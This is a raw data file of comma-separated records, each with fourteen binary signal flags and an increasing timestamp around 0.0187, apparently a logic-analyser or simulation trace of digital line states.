1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8605992e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8606012e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8606036e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8606060e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8606084e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8606104e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8606128e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8606148e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8606172e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8606196e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8606220e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8606240e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8606260e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8606284e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8606308e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8606364e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8606388e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8606412e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8606468e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8606492e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8606512e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8606532e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8606556e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8606580e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8606604e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8606624e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,1.8730984e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,1.8731204e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,1.8731228e-02 0,1,1,1,1,0,0,0,0,0,0,1,0,1,1.8731252e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,1.8731284e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,1,1.8731572e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,1.8731596e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,1,1.8731600e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,1,1.8731676e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,1,1.8731700e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,1.8731708e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,1,1.8731724e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,1.8731748e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,1,1.8731752e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,1,1.8731788e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,1,1.8731812e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8731816e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8731820e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8731836e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8731860e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8731868e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8731900e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8731924e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8731932e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8731948e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8731972e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8731980e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8732020e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8732044e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8732052e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8732068e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8732092e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8732120e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8732140e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8732172e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8732196e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8732244e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8732268e-02 0,1,1,1,1,0,0,0,0,1,0,0,0,0,1.8732272e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8732276e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8732320e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8732348e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8732352e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8732368e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8732392e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8732396e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8732444e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8732468e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8732476e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8732492e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8732516e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8732540e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8732568e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8732592e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8732620e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8732644e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8732668e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8732672e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8732716e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8732740e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8732748e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8732768e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8732792e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8732796e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8732844e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8732868e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8732876e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8732892e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8732916e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8732940e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8732968e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8732992e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8733020e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8733068e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8733092e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8733100e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8733144e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8733164e-02 0,1,1,1,1,1,0,0,0,0,0,0,0,0,1.8733172e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8733176e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8733188e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8733212e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8733268e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8733292e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8733316e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8733344e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8733372e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8733392e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8733420e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8733444e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8733468e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8733492e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8733500e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8733548e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8733572e-02 0,1,1,1,1,1,0,0,0,0,0,0,0,0,1.8733576e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8733580e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8733596e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8733620e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8733644e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8733668e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8733676e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8733720e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8733748e-02 0,1,1,1,1,1,0,0,0,0,0,0,0,0,1.8733752e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8733756e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8733772e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8733796e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8733820e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8733848e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8733872e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8733900e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8733924e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8733948e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8733972e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8733996e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8734004e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8734048e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8734072e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8734080e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8734124e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8734148e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8734176e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8734200e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8734224e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8734252e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8734276e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8734300e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8734304e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8734348e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8734376e-02 0,1,1,1,1,1,0,0,0,0,0,0,0,0,1.8734380e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8734384e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8734400e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8734424e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8734428e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8734452e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8734476e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8734500e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8734524e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8734548e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8734572e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8734600e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8734624e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8734676e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8734700e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8734724e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8734748e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8734756e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8734772e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8734800e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8734824e-02 0,1,1,1,1,0,0,0,0,1,0,0,0,0,1.8734852e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8734856e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8734900e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8734924e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8734932e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8734948e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8734972e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8735000e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8735024e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8735052e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8735076e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8735100e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8735124e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8735148e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8735172e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8735200e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8735224e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8735252e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8735276e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8735300e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8735324e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8735348e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8735372e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8735400e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8735424e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8735448e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8735476e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8735500e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8735524e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8735548e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8735572e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8735600e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8735624e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8735648e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8735676e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8735700e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8735724e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8735748e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8735772e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8735800e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8735824e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8735848e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8735876e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8735900e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8735924e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8735948e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8735972e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8736000e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8736024e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8736048e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8736076e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8736100e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8736124e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8736148e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8736172e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8736200e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8736224e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8736248e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8736276e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8736300e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8736324e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8736348e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8736372e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8736400e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8736424e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8736448e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8736476e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8736500e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8736524e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8736548e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8736572e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8736600e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8736624e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8736648e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8736676e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8736700e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8736724e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8736748e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8736772e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8736800e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8736824e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8736848e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8736876e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8736900e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8736924e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8736948e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8736972e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8737000e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8737024e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8737052e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8737076e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8737100e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8737124e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8737148e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8737172e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8737200e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8737224e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8737252e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8737276e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8737300e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8737324e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8737348e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8737372e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8737400e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8737424e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8737452e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8737476e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8737500e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8737524e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8737548e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8737572e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8737600e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8737624e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8737652e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8737676e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8737700e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8737724e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8737748e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8737772e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8737800e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8737824e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8737852e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8737876e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8737900e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8737924e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8737948e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8737972e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8738000e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8738024e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8738052e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8738076e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8738100e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8738124e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8738148e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8738172e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8738200e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8738224e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8738252e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8738276e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8738300e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8738324e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8738356e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8738380e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8738404e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8738428e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,1.8862888e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,1,1.8863068e-02 1,1,1,1,1,0,0,0,0,0,0,1,0,1,1.8863104e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,1,1.8863124e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8863720e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8864172e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8864204e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8864208e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8864228e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8864256e-02 1,1,1,1,1,1,0,0,0,0,0,0,0,0,1.8864260e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8864264e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8864304e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8864328e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8864332e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8864356e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8864380e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8864388e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8864428e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8864456e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8864460e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8864480e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8864500e-02 1,1,1,1,1,1,0,0,0,0,0,0,0,0,1.8864512e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8864516e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8864528e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8864556e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8864580e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8864604e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8864612e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8864656e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8864680e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8864728e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8864756e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8864804e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8864828e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8864832e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8864856e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8864880e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8864928e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8864956e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8864960e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8864980e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8865004e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8865008e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8865052e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8865076e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8865084e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8865100e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8865128e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8865152e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8865180e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8865204e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8865228e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8865252e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8865276e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8865284e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8865328e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8865352e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8865360e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8865380e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8865404e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8865408e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8865428e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8865452e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8865460e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8865504e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8865528e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8865580e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8865604e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8865652e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8865676e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8865684e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8865700e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8865728e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8865780e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8865804e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8865812e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8865828e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8865852e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8865860e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8865876e-02 